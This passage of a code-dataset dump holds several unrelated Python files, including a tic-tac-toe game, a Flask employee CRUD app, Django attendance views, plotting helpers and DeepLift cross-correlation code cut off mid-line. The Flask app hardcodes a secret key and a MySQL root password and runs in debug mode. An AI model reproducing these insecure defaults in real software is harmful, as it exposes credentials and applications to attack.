int(position)-1\r\n\r\n if board[position]==\"-\":\r\n valid=True\r\n\r\n\r\n else:\r\n print(\"Position already taken enter an empty space \")\r\n\r\n board[position] = current\r\n display_board()\r\n\r\ndef check_game_over():\r\n \r\n check_win()\r\n\r\n check_tie()\r\n\r\n\r\n\r\ndef check_win():\r\n\r\n global winner\r\n\r\n row_winner=check_rows()\r\n\r\n column_winner=check_columns()\r\n\r\n diagonal_winner=check_diagonals()\r\n\r\n if row_winner:\r\n winner=row_winner\r\n\r\n elif column_winner:\r\n winner=column_winner\r\n\r\n elif diagonal_winner:\r\n winner=diagonal_winner\r\n\r\n else:\r\n winner=None\r\n\r\n return\r\n\r\ndef check_rows():\r\n\r\n global game_active\r\n\r\n row_1 = board[0] == board[1] == board[2] != \"-\"\r\n row_2 = board[3] == board[4] == board[5] != \"-\"\r\n row_3 = board[6] == board[7] == board[8] != \"-\"\r\n\r\n if row_1 or row_2 or row_3:\r\n game_active=False\r\n\r\n if row_1:\r\n return board[0]\r\n\r\n elif row_2:\r\n return board[3]\r\n\r\n elif row_3:\r\n return board[6]\r\n\r\n return\r\n\r\ndef check_columns():\r\n global game_active\r\n\r\n column_1 = board[0] == board[3] == board[6] != \"-\"\r\n column_2 = board[1] == board[4] == board[7] != \"-\"\r\n column_3 = board[2] == board[5] == board[8] != \"-\"\r\n\r\n if column_1 or column_2 or column_3:\r\n game_active = False\r\n\r\n if column_1:\r\n return board[0]\r\n\r\n elif column_2:\r\n return board[1]\r\n\r\n elif column_3:\r\n return board[2]\r\n\r\n return\r\n\r\ndef check_diagonals():\r\n global game_active\r\n\r\n diagonal_1 = board[0] == board[4] == board[8] != \"-\"\r\n diagonal_2 = board[2] == board[4] == board[6] != \"-\"\r\n\r\n if diagonal_1 or diagonal_2 :\r\n game_active = False\r\n\r\n if diagonal_1:\r\n return board[0]\r\n\r\n elif diagonal_2:\r\n return board[2]\r\n\r\n return\r\n\r\n\r\ndef check_tie():\r\n global game_active\r\n\r\n if \"-\" not in board:\r\n game_active=False\r\n \r\n return\r\n\r\n\r\ndef change_player():\r\n global current\r\n\r\n if current==\"X\":\r\n current=\"O\"\r\n\r\n elif current==\"O\":\r\n current=\"X\"\r\n return\r\n\r\ndef get_players():\r\n global player1,player2\r\n player1=input(\"Enter name of player 1 : \")\r\n player2=input(\"Enter name of player 2 : \")\r\n print(player1,\" is X\")\r\n print(player2,\" is O\")\r\n\r\n\r\nplay_game()","sub_path":"game2.py","file_name":"game2.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"434257105","text":"from flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.secret_key = \"Secret Key\"\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:password123@localhost/employees'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n#initializing database\ndb = SQLAlchemy(app)\n\n#database model -> database table creation\nclass employees_data(db.Model):\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(150), nullable = False)\n address = db.Column(db.String(150), nullable = False)\n mobile = db.Column(db.String(20), nullable = False)\n email = db.Column(db.String(100), nullable = False, unique = True)\n sss = db.Column(db.String(15), nullable = False)\n pagibig = db.Column(db.String(15), nullable = False)\n philhealth = db.Column(db.String(15), nullable = False)\n hired = db.Column(db.Date, nullable = False)\n status = db.Column(db.String(150), nullable = False)\n remarks = db.Column(db.String(250), nullable = False)\n\n def __init__(self, id, name, address, mobile, email, sss, pagibig, philhealth, hired, status, remarks):\n self.id = id\n self.name = name\n self.address = address\n self.mobile = mobile\n self.email = email\n self.sss = sss\n self.pagibig = pagibig\n self.philhealth = philhealth\n self.hired = hired\n self.status = status\n self.remarks = remarks\n\n@app.route(\"/\")\ndef index():\n all_data = employees_data.query.all()\n return render_template(\"index.html\", employees = all_data)\n\n@app.route('/insert', methods = ['POST'])\ndef insert():\n if request.method == 'POST':\n id = request.form['id']\n name = request.form['name']\n address = request.form['address']\n mobile = request.form['mobile']\n email = request.form['email']\n sss = request.form['sss']\n pagibig = request.form['pagibig']\n philhealth = request.form['philhealth']\n hired = request.form['hired']\n status = request.form['status']\n remarks = request.form['remarks']\n\n my_data = employees_data(id, name, address, mobile, email, sss, pagibig, philhealth, hired, status, remarks)\n db.session.add(my_data)\n db.session.commit()\n\n flash(\"Employee Inserted Successfully\")\n return redirect(url_for('index'))\n\n@app.route('/update', methods = ['GET', 'POST'])\ndef update():\n if request.method == 'POST':\n my_data = employees_data.query.get(request.form.get('id'))\n\n my_data.id = request.form['id']\n my_data.name = request.form['name']\n my_data.address = request.form['address']\n my_data.mobile = request.form['mobile']\n my_data.email = request.form['email']\n my_data.sss = request.form['sss']\n my_data.pagibig = request.form['pagibig']\n my_data.philhealth = request.form['philhealth']\n my_data.hired = request.form['hired']\n my_data.status = request.form['status']\n my_data.remarks = request.form['remarks']\n\n db.session.commit()\n\n flash(\"Employee Updated Successfully\")\n return redirect(url_for('index'))\n\n#error pages\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template(\"error.html\"), 404\n\n@app.errorhandler(500)\ndef page_not_found(e):\n return render_template(\"error.html\"), 500\n\nif __name__== \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"440696900","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect\nfrom .models import Asistencia, Motivo\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse\nfrom apps.alumnos.models import Alumno\nfrom apps.cursos.models import Curso\nfrom django.views.generic import CreateView\nfrom django.views.generic import ListView\nfrom django.views.generic import DeleteView\nfrom django.views.generic import UpdateView\nfrom django.views.generic import TemplateView\nfrom django_datatables_view.base_datatable_view import BaseDatatableView\nfrom django.db.models import Q\nfrom django.conf import settings\n\nlogger = logging.getLogger(__name__)\n\nclass AsistenciaAlta(TemplateView):\n model = Asistencia\n success_url = '/asistencia/listado'\n template_name = 'asistencias/asistencia_ajax.html'\n\n def get_context_data(self, *args, **kwargs):\n extra_context = super(AsistenciaAlta, self).get_context_data(*args, **kwargs)\n extra_context = {\n \"alumnos_list\": Alumno.objects.filter(cursos__id=self.kwargs['pk']),\n \"motivos_list\": Motivo.objects.all(),\n \"cursos_list\": Curso.objects.all(),\n \"cur_list\": Motivo.objects.all(),\n }\n\n return extra_context\n\n def form_valid(self, form):\n self.object = form.save()\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass AsistenciaListado(ListView):\n model = Asistencia\n\n\nclass OrderListJson(BaseDatatableView):\n model = Asistencia\n columns = ['id', 'alumno', 'fecha', 'motivo']\n order_columns = ['id', 'alumno', 'fecha', 'motivo']\n max_display_length = 100\n pre_camel_case_notation = False\n\n def initialize(self, *args, **kwargs):\n if 'iSortingCols' in self.request.REQUEST:\n self.pre_camel_case_notation = True\n\n def render_column(self, row, column):\n \"\"\" Renders a column on a row\n \"\"\"\n if hasattr(row, 'get_%s_display' % column):\n # It's a choice field\n text = getattr(row, 'get_%s_display' % column)()\n else:\n try:\n text = getattr(row, column)\n except AttributeError:\n obj = row\n for part in column.split('.'):\n if obj is None:\n break\n obj = getattr(obj, part)\n text = obj\n\n if hasattr(row, 'get_absolute_url'):\n if column == 'id':\n return '%s' % (row.get_absolute_url(), text)\n else:\n return '%s' % (text)\n else:\n return text\n\n def get_order_columns(self):\n \"\"\" Return list of columns used for ordering\n \"\"\"\n return self.order_columns\n\n def filter_queryset(self, qs):\n \"\"\" If search['value'] is provided then filter all searchable columns using istartswith\n \"\"\"\n if not self.pre_camel_case_notation:\n # get global search value\n search = self.request.GET.get('search[value]', None)\n col_data = self.extract_datatables_column_data()\n q = Q()\n for col_no, col in enumerate(col_data):\n # apply global search to all searchable columns\n if search and col['searchable']:\n q |= Q(**{'alumno__apellido__istartswith'.format(self.columns[col_no]): search})\n # column specific filter\n if col['search.value']:\n qs = qs.filter(**{'alumno__apellido__istartswith'.format(self.columns[col_no]): col['search.value']})\n qs = qs.filter(q)\n return qs\n\n def ordering(self, qs):\n \"\"\" Get parameters from the request and prepare order by clause\n \"\"\"\n request = self.request\n\n ## Number of columns that are used in sorting\n sorting_cols = 0\n if self.pre_camel_case_notation:\n try:\n sorting_cols = int(request.REQUEST.get('iSortingCols', 0))\n except ValueError:\n sorting_cols = 0\n else:\n sort_key = 'order[{0}][column]'.format(sorting_cols)\n while sort_key in self.request.REQUEST:\n sorting_cols += 1\n sort_key = 'order[{0}][column]'.format(sorting_cols)\n\n order = []\n order_columns = self.get_order_columns()\n\n for i in range(sorting_cols):\n # sorting column\n sort_dir = 'asc'\n try:\n if self.pre_camel_case_notation:\n sort_col = int(request.REQUEST.get('iSortCol_{0}'.format(i)))\n # sorting order\n sort_dir = request.REQUEST.get('sSortDir_{0}'.format(i))\n else:\n sort_col = int(request.REQUEST.get('order[{0}][column]'.format(i)))\n # sorting order\n sort_dir = request.REQUEST.get('order[{0}][dir]'.format(i))\n except ValueError:\n sort_col = 0\n\n sdir = '-' if sort_dir == 'desc' else ''\n sortcol = order_columns[sort_col]\n\n if isinstance(sortcol, list):\n for sc in sortcol:\n order.append('{0}{1}'.format(sdir, sc.replace('.', '__')))\n else:\n order.append('{0}{1}'.format(sdir, sortcol.replace('.', '__')))\n\n if order:\n return qs.order_by(*order)\n return qs\n\n def get_initial_queryset(self):\n if not self.model:\n raise NotImplementedError(\"Need to provide a model or implement get_initial_queryset!\")\n return self.model.objects.all()\n\n def prepare_results(self, qs):\n data = []\n for item in qs:\n #item.dni = item.get_absolute_url()\n data.append([self.render_column(item, column) for column in self.get_columns()])\n return data\n\n def get_context_data(self, *args, **kwargs):\n request = self.request\n try:\n self.initialize(*args, **kwargs)\n\n qs = self.get_initial_queryset()\n\n # number of records before filtering\n total_records = qs.count()\n\n qs = self.filter_queryset(qs)\n\n # number of records after filtering\n total_display_records = qs.count()\n\n qs = self.ordering(qs)\n qs = self.paging(qs)\n\n # prepare output data\n if self.pre_camel_case_notation:\n aaData = self.prepare_results(qs)\n\n ret = {'sEcho': int(request.REQUEST.get('sEcho', 0)),\n 'iTotalRecords': total_records,\n 'iTotalDisplayRecords': total_display_records,\n 'aaData': aaData\n }\n else:\n data = self.prepare_results(qs)\n\n ret = {'draw': int(request.REQUEST.get('draw', 0)),\n 'recordsTotal': total_records,\n 'recordsFiltered': total_display_records,\n 'data': data\n }\n except Exception as e:\n logger.exception(str(e))\n\n if settings.DEBUG:\n import sys\n from django.views.debug import ExceptionReporter\n reporter = ExceptionReporter(None, *sys.exc_info())\n text = \"\\n\" + reporter.get_traceback_text()\n else:\n text = \"\\nAn error occured while processing an AJAX request.\"\n\n if self.pre_camel_case_notation:\n ret = {'result': 'error',\n 'sError': text,\n 'text': text,\n 'aaData': [],\n 'sEcho': int(request.REQUEST.get('sEcho', 0)),\n 'iTotalRecords': 0,\n 'iTotalDisplayRecords': 0, }\n else:\n ret = {'error': text,\n 'data': [],\n 'recordsTotal': 0,\n 'recordsFiltered': 0,\n 'draw': int(request.REQUEST.get('draw', 0))}\n return ret\n\n\n\nclass AsistenciaBaja(DeleteView):\n model = Asistencia\n success_url = '/asistencia/listado'\n\n\nclass AsistenciaModi(UpdateView):\n template_name = 'asistencias/asistencia_form.html'\n model = Asistencia\n success_url = '/asistencia/listado'\n\n\nclass Alumnos(TemplateView):\n\n def post(self, request, *args, **kwargs):\n alumnos = request.POST['alumnos_list']\n alumnos_list = alumnos.split()\n fecha_list = request.POST['id_fecha'].split(\"/\")\n fecha_post = str(fecha_list[2]) + \"-\" + str(fecha_list[1]) + \"-\" + str(fecha_list[0])\n motivo_post = request.POST['id_motivo']\n for alumno in alumnos_list:\n Asistencia.objects.create(\n alumno=Alumno.objects.get(pk=alumno),\n fecha=fecha_post,\n motivo=Motivo.objects.get(pk=motivo_post)\n )\n\n return redirect('/asistencia/listado/')","sub_path":"apps/asistencias/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"43962588","text":"scelta=0\nn_task=0\ntask=[]\nfrom sys import argv\nfp= argv[1]\ntxt= open(fp)\nfor strng in txt.read().splitlines():\n task.append(strng)\n n_task+=1\nwhile scelta!=4:\n print(\"Task Manager\")\n print(\"1. Insert a new task (a string of text)\")\n print(\"2. Remove a task (by typing a substring of its content)\")\n print(\"3. Show all existing tasks, sorted in alphabetic order\")\n print(\"4. Close the program\")\n scelta=int(input(\"Make your choice: \"))\n if(scelta==1):\n task.append(input(\"Insert task's content: \"))\n n_task+=1\n elif(scelta==2):\n if(n_task<=0):\n print(\"No tasks\")\n else:\n ctrl= input(\"Insert task's substring: \")\n for strng in task:\n if ctrl in strng:\n task.remove(strng)\n elif(scelta==3):\n if (n_task <= 0):\n print(\"No tasks\")\n else:\n print(sorted(task))\n elif(scelta==4):\n print(\"The End\")\n txt.close()\n txt= open(fp, \"w\")\n for strng in task:\n txt.write(strng+\"\\n\")\n txt.close()","sub_path":"python_file3.py","file_name":"python_file3.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"256814454","text":"from copy import deepcopy\n\nfrom d3graph import d3graph\n\n\ndef test_instantiate_d3graph_no_args() -> None:\n \"\"\"Test instantiation works with defaults\"\"\"\n d3 = d3graph()\n assert isinstance(d3, type(d3graph()))\n\n\ndef test_clean(d3, helpers) -> None:\n \"\"\"Test _clean method deletes the attributes in clean_fields\"\"\"\n clean_fields: tuple = ('adjmat', 'config', 'edge_properties', 'G', 'node_properties')\n\n # Set attrs to dummy value (i.e., 0) and assert they exist in the object\n original_attrs = {field: 0 for field in clean_fields}\n d3_og = helpers.setattrs(obj=d3, **original_attrs)\n\n # Make a copy of the object and apply _clean()\n d3_new = deepcopy(d3_og)\n d3_new._clean()\n\n assert len([attr for attr in vars(d3_og) if attr in clean_fields]) == len(clean_fields)\n assert all(isinstance(i, int) for i in map(vars(d3_og).get, clean_fields))\n assert not [attr for attr in vars(d3_new) if attr in clean_fields]\n assert not any(hasattr(d3_new, attr) for attr in vars(d3_new) if attr in clean_fields)\n \n","sub_path":"tests/test_d3graph.py","file_name":"test_d3graph.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"83585420","text":"class user:\n def __init__(self,name,email,account_balance=0): #any parameter we didn't give it a defualt value it means that it is a mandatory and we should privide it when creating a new user, but if we give it a default value this means that it is optional and we don't have to give a value for it, if we didn't give it a value it will take the default one.\n self.name=name\n self.email=email\n self.account_balance=account_balance\n def make_deposite (self, amount):\n self.account_balance+=amount\n def make_withdrawal(self, amount=0):\n if amount <= self.account_balance:\n self.account_balance-=amount\n return True\n return False \n def display_user_balance(self):\n print(\"User Name: \"+self.name +\", User Balance: \"+ str(self.account_balance))\n def transfer_money(self, other_user, amount):\n if self.make_withdrawal(amount):\n other_user.make_deposite(amount)\n return True\n return False \n\nsahar =user(\"sahar\", \"murrarsahar@gmail.com\", 1200)\nsahar.make_deposite(500)\nsahar.display_user_balance()\nmomen = user(\"momen\", \"user2@gmial.com\", 2000)\nsahar.transfer_money(momen, 400)\n\nsahar.display_user_balance()\nmomen.display_user_balance()","sub_path":"_python/OOP/User/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"617476490","text":"import numpy as np\n\n\ndef compute_angle_weights_1d(angles):\n \"\"\"\n Compute the weight for each angle according to the distance between its\n neighbors.\n Parameters\n ----------\n angles: 1d ndarray of length A\n Angles in radians\n Returns\n -------\n weights: 1d ndarray of length A\n The weights for each angle\n Notes\n -----\n To compute the weights, the angles are set modulo PI, not modulo 2PI.\n This reduces artifacts when the angular coverage is between PI and 2PI\n but does not affect the result when the angles cover the full 2PI interval.\n \"\"\"\n # copy and modulo np.pi\n # This is an array with values in [0, np.pi)\n angles = (angles.flatten() - angles.min()) % (np.pi)\n # sort the array\n sortargs = np.argsort(angles)\n sortangl = angles[sortargs]\n # compute weights for sorted angles\n da = (np.roll(sortangl, -1) - np.roll(sortangl, 1)) % (np.pi)\n weights = da/np.sum(da)*da.shape[0]\n\n unsortweights = np.zeros_like(weights)\n # Sort everything back where it belongs\n unsortweights[sortargs] = weights\n return unsortweights\n","sub_path":"odtbrain/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"222232029","text":"from matplotlib.pylab import plt\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\n\nimport matplotlib.patches as patches\n\nimport plotly.figure_factory as ff\n\nimport matplotlib._color_data as mcd\nimport matplotlib.dates as mdates\nfrom IPython.display import display\n\n\ndef displaycontent(dataset):\n if not (hasattr(dataset, 'sensor_events')):\n return\n print('sensor events:')\n display(dataset.sensor_events.iloc[20:25])\n print('activity_events:')\n display(dataset.activity_events.loc[1:1])\n print('sensor_desc:')\n display(dataset.sensor_desc.iloc[1:3])\n print(\"Activites: \", dataset.activities)\n for a, v in dataset.activities_map.items():\n items = dataset.activity_events.loc[dataset.activity_events['Activity'] == a]['Duration']\n # print(a,v)\n # display(items.describe())\n print(a, v, '\\t--> count=', items.count(), ' avg duration=', str(items.mean()))\n x = dataset.activity_events.copy()\n x['Duration'] = x['Duration'].dt.seconds\n x.boxplot(by='Activity', column='Duration')\n\n\n# loadA4HDataSet()\n# loadVanKasterenDataset()\n# loadKaryoAdlNormalDataset();\n# display()\n\n\ndef view(dataset, i):\n if not (hasattr(dataset, 'sensor_events')):\n return\n tmp_act_evants = dataset.activity_events.loc[dataset.activity_events['Activity'] == i]\n\n print(dataset.activities_map[i])\n print(tmp_act_evants['Duration'].describe())\n if len(tmp_act_evants) == 0:\n return\n\n fig = plt.figure()\n\n tmp_act_evants['StartTime'].iloc[0]\n all = pd.DataFrame()\n for index, row in tmp_act_evants.iterrows():\n myse = dataset.sensor_events.loc[(dataset.sensor_events['time'] >= row['StartTime']) & (dataset.sensor_events['time'] <= row['EndTime'])].copy()\n myse['relative'] = dataset.sensor_events['time'] - row['StartTime']\n myse['hit time'] = myse['relative'] / row['Duration']\n all = pd.concat([all, myse[['hit time', 'SID']]])\n # plt.scatter(myse['hit time'],myse['SID'])\n\n tmp = all.copy()\n\n tmp['hit time'] = (tmp['hit time'] * 2).round(0) / 2\n fig = plt.figure(figsize=(10, 5))\n a = pd.pivot_table(tmp, columns='hit time', index='SID', aggfunc=np.count_nonzero, fill_value=0)\n a = a / a.max()\n # plt.imshow(a, cmap='hot', interpolation='nearest')\n ax = plt.axes()\n sns.heatmap(a / a.max(), cmap=sns.cm.rocket_r, ax=ax)\n ax.set_title(dataset.activities_map[i])\n\n\n# view(5)\n\n\ndef plotAct(dataset, acts):\n firstacts = acts.iloc[0]\n acts = acts.loc[acts['StartTime'] < firstacts['StartTime'] + pd.Timedelta('7d')]\n lastact = acts.iloc[-1]\n lastactinDay = acts.loc[acts['StartTime'] < firstacts['StartTime'] + pd.Timedelta('20h')].iloc[-1]\n\n # for a in dataset.activities:\n # acts = acts.append({\n # 'Activity': dataset.activities_map_inverse[a],\n # 'StartTime': firstacts['StartTime'],\n # 'EndTime': firstacts['StartTime']\n # },\n # ignore_index=True)\n\n acts = acts.sort_values(by='Activity')\n\n df2 = acts.apply(lambda x: dict(Task=dataset.activities_map[x.Activity], Color=0, Start=x.StartTime, Finish=x.EndTime), axis=1).tolist()\n # configure_plotly_browser_state()\n # init_notebook_mode(connected=False)\n # fig=ff.create_gantt(df2, index_col='Color', group_tasks=True)\n\n fig = ff.create_gantt(df2, group_tasks=True)\n fig['layout'].update(margin=dict(l=150))\n fig['layout'].update(xaxis=dict(range=[firstacts['StartTime'], lastactinDay['EndTime']],\n rangeselector=dict(buttons=list([\n dict(count=4, label='4h', step='hour', stepmode='backward'),\n dict(count=6, label='6h', step='hour', stepmode='backward'),\n dict(count=8, label='8h', step='hour', stepmode='backward'),\n dict(count=10, label='10h', step='hour', stepmode='backward'),\n dict(count=12, label='12h', step='hour', stepmode='backward'),\n dict(count=1, label='1d', step='day', stepmode='backward'),\n dict(count=5, label='5d', step='day', stepmode='backward'),\n dict(step='all')\n ])),\n rangeslider=dict(\n visible=True,\n range=[firstacts['StartTime'], lastact['EndTime']],\n )))\n\n fig.show()\n\n\ndef sensor_hitmap(dataset):\n if not (hasattr(dataset, 'sensor_events')):\n return\n actscount = len(dataset.activities)\n import matplotlib.pyplot as plt\n\n fig, subplots = plt.subplots((actscount - 1) // 4 + 1, 4, sharex=True, sharey=True,figsize=(10,12))\n subplots = subplots.reshape(-1)\n for i in dataset.activities_map:\n tmp_act_evants = dataset.activity_events.loc[dataset.activity_events['Activity'] == i]\n\n # print(dataset.activities_map[i])\n # print(tmp_act_evants['Duration'].describe())\n if len(tmp_act_evants) == 0:\n continue\n\n # fig = plt.figure()\n\n # tmp_act_evants['StartTime'].iloc[0]\n all = pd.DataFrame()\n for index, row in tmp_act_evants.iterrows():\n myse = dataset.sensor_events.loc[(dataset.sensor_events['time'] >= row['StartTime']) & (dataset.sensor_events['time'] <= row['EndTime'])].copy()\n myse['relative'] = dataset.sensor_events['time'] - row['StartTime']\n myse['hit time'] = myse['relative'] / row['Duration']\n all = pd.concat([all, myse[['hit time', 'SID']]])\n # plt.scatter(myse['hit time'],myse['SID'])\n\n tmp = all.copy()\n\n tmp['hit time'] = (tmp['hit time'] * 2).round(0) / 2\n fig = plt.figure(figsize=(10, 5))\n a = pd.pivot_table(tmp, columns='hit time', index='SID', aggfunc=np.count_nonzero, fill_value=0)\n a = a / a.max()\n # plt.imshow(a, cmap='hot', interpolation='nearest')\n ax = subplots[i]\n sns.heatmap(a / a.max(), cmap=sns.cm.rocket_r, ax=ax)\n ax.set_title(dataset.activities_map[i])\n","sub_path":"result_analyse/dataset_viewer.py","file_name":"dataset_viewer.py","file_ext":"py","file_size_in_byte":6285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"31026932","text":"import os\nimport signal\nimport deeplift\nimport numpy as np\nimport deeplift.backend as B\nimport theano\nimport theano.tensor.signal.conv\nimport h5py\nimport traceback\ndef create_detector_from_subset_of_sequential_layers(sequential_container,\n idx_of_layer_of_interest,\n channel_indices,\n multipliers_on_channels):\n layers = [] \n #this adds in all the layers preceeding idx_of_layer_of_interest\n #(remember zero-based indexing...)\n for layer_idx in range(idx_of_layer_of_interest):\n layers.append(\n sequential_container.get_layers()[layer_idx].copy_blob_keep_params()\n )\n #add in the layer of interest, but with the channels subsetted to\n #the channels of interest\n layer_to_subset = sequential_container.get_layers()\\\n [idx_of_layer_of_interest]\n assert hasattr(layer_to_subset, \"W\"), \"Layer does not have weights - \"\\\n +\" make sure you have supplied the correct index for the conv layer?\"\n subsetted_weights = layer_to_subset.W[channel_indices]\n subsetted_biases = layer_to_subset.b[channel_indices]\n layer_kwargs = layer_to_subset.get_yaml_compatible_object_kwargs()\n layer_kwargs['W'] = subsetted_weights \n layer_kwargs['b'] = subsetted_biases\n subsetted_layer = layer_to_subset.\\\n load_blob_from_yaml_contents_only(**layer_kwargs)\n layers.append(subsetted_layer)\n #check if the next layer is an activation layer\n layer_after_layer_of_interest =\\\n sequential_container.get_layers()[idx_of_layer_of_interest+1]\n if isinstance(layer_after_layer_of_interest, deeplift.blobs.Activation):\n layers.append(layer_after_layer_of_interest.copy_blob_keep_params())\n #multipliers_layer = sequential_container.get_layers()[layer_idx+1].copy_blob_keep_params()\n #add in a layer with a conv filter that is the multipliers\n #need to be reversed because this is doing a convolution, not cross corr\n multipliers_layer = deeplift.blobs.Conv2D(\n name=\"multipliers_layer\",\n W=multipliers_on_channels[:,:,::-1,::-1].astype('float32'),\n b=np.zeros(multipliers_on_channels.shape[0])\\\n .astype('float32'),\n strides=(1,1), \n border_mode=B.BorderMode.valid)\n layers.append(multipliers_layer)\n deeplift.util.connect_list_of_layers(layers)\n layers[-1].build_fwd_pass_vars()\n model_to_return = deeplift.models.SequentialModel(layers=layers)\n model_to_return.get_layers()\n return model_to_return\ndef get_conv_out_symbolic_var(input_var,\n set_of_2d_patterns_to_conv_with,\n normalise_by_magnitude,\n take_max,\n mode='full'):\n assert len(set_of_2d_patterns_to_conv_with.shape)==3\n if (normalise_by_magnitude):\n set_of_2d_patterns_to_conv_with =\\\n set_of_2d_patterns_to_conv_with/\\\n (np.sqrt(np.sum(np.sum(np.square(set_of_2d_patterns_to_conv_with),\n axis=-1),\n axis=-1))[:,None,None])\n set_of_2d_patterns_to_conv_with = np.expand_dims(set_of_2d_patterns_to_conv_with, 1)\n filters = theano.tensor.as_tensor_variable(\n x=set_of_2d_patterns_to_conv_with,\n name=\"filters\")\n conv_out = theano.tensor.nnet.conv2d(\n input=input_var,\n filters=filters,\n border_mode=mode)\n if (normalise_by_magnitude):\n sum_squares_per_pos =\\\n theano.tensor.nnet.conv2d(\n input=theano.tensor.square(input_var),\n filters=np.ones(set_of_2d_patterns_to_conv_with.shape)\\\n .astype(\"float32\"),\n border_mode=mode) \n per_pos_magnitude = theano.tensor.sqrt(sum_squares_per_pos)\n per_pos_magnitude += 0.0000001*(per_pos_magnitude < 0.0000001)\n conv_out = conv_out/per_pos_magnitude\n if (take_max):\n conv_out = theano.tensor.max(\n theano.tensor.max(conv_out, axis=-1), #max over cols\n axis=-1) #max over rows\n return conv_out \ndef compile_conv_func_with_theano(set_of_2d_patterns_to_conv_with,\n normalise_by_magnitude=False,\n take_max=False,\n mode='full'):\n # input_var = theano.tensor.TensorType(dtype=theano.config.floatX,\n # broadcastable=[False]*3)(\"input\")\n input_var = theano.tensor.TensorType(dtype=theano.config.floatX,\n broadcastable=[False, True, False, False])(\"input\")\n conv_out = get_conv_out_symbolic_var(input_var,\n set_of_2d_patterns_to_conv_with,\n normalise_by_magnitude=normalise_by_magnitude,\n take_max=take_max,\n mode=mode)\n func = theano.function([input_var],\n conv_out,\n allow_input_downcast=True)\n return func \ndef get_max_cross_corr(filters, things_to_scan,\n verbose=True, batch_size=10,\n func_params_size=1000000,\n progress_update=1000,\n min_overlap=0.3):\n \"\"\"\n func_params_size: when compiling functions\n \"\"\"\n #reverse the patterns as the func is a conv not a cross corr\n filters = filters.astype(\"float32\")[:,::-1,::-1]\n to_return = np.zeros((filters.shape[0], len(things_to_scan)))\n #compile the number of filters that result in a function with\n #params equal to func_params_size \n params_per_filter = np.prod(filters[0].shape)\n filter_batch_size = int(func_params_size/params_per_filter)\n filter_length = filters.shape[-1]\n filter_idx = 0 \n while filter_idx < filters.shape[0]:\n if (verbose):\n print(\"On filters\",filter_idx,\"to\",(filter_idx+filter_batch_size))\n filter_batch = filters[filter_idx:(filter_idx+filter_batch_size)]\n cross_corr_func = compile_conv_func_with_theano(\n set_of_2d_patterns_to_conv_with=filter_batch,\n normalise_by_magnitude=False,\n take_max=True) \n padding_amount = int((filter_length)*(1-min_overlap))\n padded_input = np.expand_dims(np.array([np.pad(array=x,\n pad_width=((padding_amount, padding_amount)),\n mode=\"constant\") for x in things_to_scan]), axis=1)\n max_cross_corrs = np.array(deeplift.util.run_function_in_batches(\n func=cross_corr_func,\n input_data_list=[padded_input],\n batch_size=batch_size,\n progress_update=(None if verbose==False else\n progress_update)))\n assert len(max_cross_corrs.shape)==2, max_cross_corrs.shape\n to_return[filter_idx:\n (filter_idx+filter_batch_size),:] =\\\n np.transpose(max_cross_corrs)\n filter_idx += filter_batch_size\n \n return to_return\ndef get_full_cross_corr(filters, things_to_scan,\n verbose=True, batch_size=10,\n func_params_size=1000000,\n progress_update=1000,\n min_overlap=1,\n mode='valid'):\n \"\"\"\n func_params_size: when compiling functions\n \"\"\"\n #reverse the patterns as the func is a conv not a cross corr\n filters = filters.astype(\"float32\")[:,::-1,::-1]\n # padding_amount0 = int((filters[0].shape[-1])*(1-min_overlap))\n if mode == 'valid':\n num_xcor_sites = things_to_scan[0].shape[-1]-filters[0].shape[-1]+1\n elif mode == 'full':\n num_xcor_sites = things_to_scan[0].shape[-1]+filters[0].shape[-1]-1 \n to_return = np.zeros((filters.shape[0], len(things_to_scan), num_xcor_sites))\n #compile the number of filters that result in a function with\n #params equal to func_params_size \n params_per_filter = np.prod(filters[0].shape)\n filter_batch_size = int(func_params_size/params_per_filter)\n filter_length = filters.shape[-1]\n filter_idx = 0 \n while filter_idx < filters.shape[0]:\n if (verbose):\n print(\"On filters\",filter_idx,\"to\",(filter_idx+filter_batch_size))\n filter_batch = filters[filter_idx:(filter_idx+filter_batch_size)]\n cross_corr_func = compile_conv_func_with_theano(\n set_of_2d_patterns_to_conv_with=filter_batch,\n normalise_by_magnitude=False,\n take_max=False,\n mode=mode) \n padding_amount = int((filter_length)*(1-min_overlap))\n padded_input = [np.pad(array=x,\n pad_width=((padding_amount, padding_amount)),\n mode=\"constant\") for x in things_to_scan]\n all_cross_corrs = np.array(deeplift.util.run_function_in_batches(\n func=cross_corr_func,\n input_data_list=[padded_input],\n batch_size=batch_size,\n progress_update=(None if verbose==False else\n progress_update)))\n all_cross_corrs_max = all_cross_corrs.max(axis=2)\n assert len(all_cross_corrs_max.shape)==3, all_cross_corrs_max.shape\n to_return[filter_idx:\n (filter_idx+filter_batch_size),:,:] 